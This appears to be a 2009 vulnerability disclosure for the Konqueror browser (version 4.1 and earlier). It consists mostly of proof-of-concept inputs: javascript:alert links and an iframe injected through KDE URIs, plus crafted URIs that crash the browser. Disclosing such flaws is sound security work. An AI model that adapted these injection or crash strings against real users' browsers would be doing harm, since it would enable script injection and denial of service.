konqueror-xsscrash.txt
Posted on 02 January 2009
+-----------------------------------------------------+ | Konqueror <= 4.1 XSS / Remote Crash Vulnerabilities | +-----------------------------------------------------+ | by athos - staker[at]hotmail[dot]it | | http://konqueror.kde.org | +-----------------------------------------------------+ | Cross Site Scripting | | | | applications:/<a href="javascript:alert(1)">Here</a>| | trash:/<a href="javascript:alert(1)">Here</a> | | remote:/<a href="javascript:alert(1)">Here</a> | | | | you can write anything (example) | | | | applications:/<font size="8">THE GAME</font> | | applications:/<iframe src="http://milw0rm.com"> | +-----------------------------------------------------+ | Remote Crash Vulnerabilities | | | | remote://crash:konqueror@ | | applications://crash:konqueror@ | +-----------------------------------------------------+ | Error Details... | | | | A Fatal Error Occurred The application Konqueror | | (konqueror) crashed and caused the signal 6(SIGABRT)| | Please help us improve the software you use by | | filing a report at http://bugs.kde.org. Useful | | details include how to reproduce the error, | | documents that were loaded, etc. | +-----------------------------------------------------+
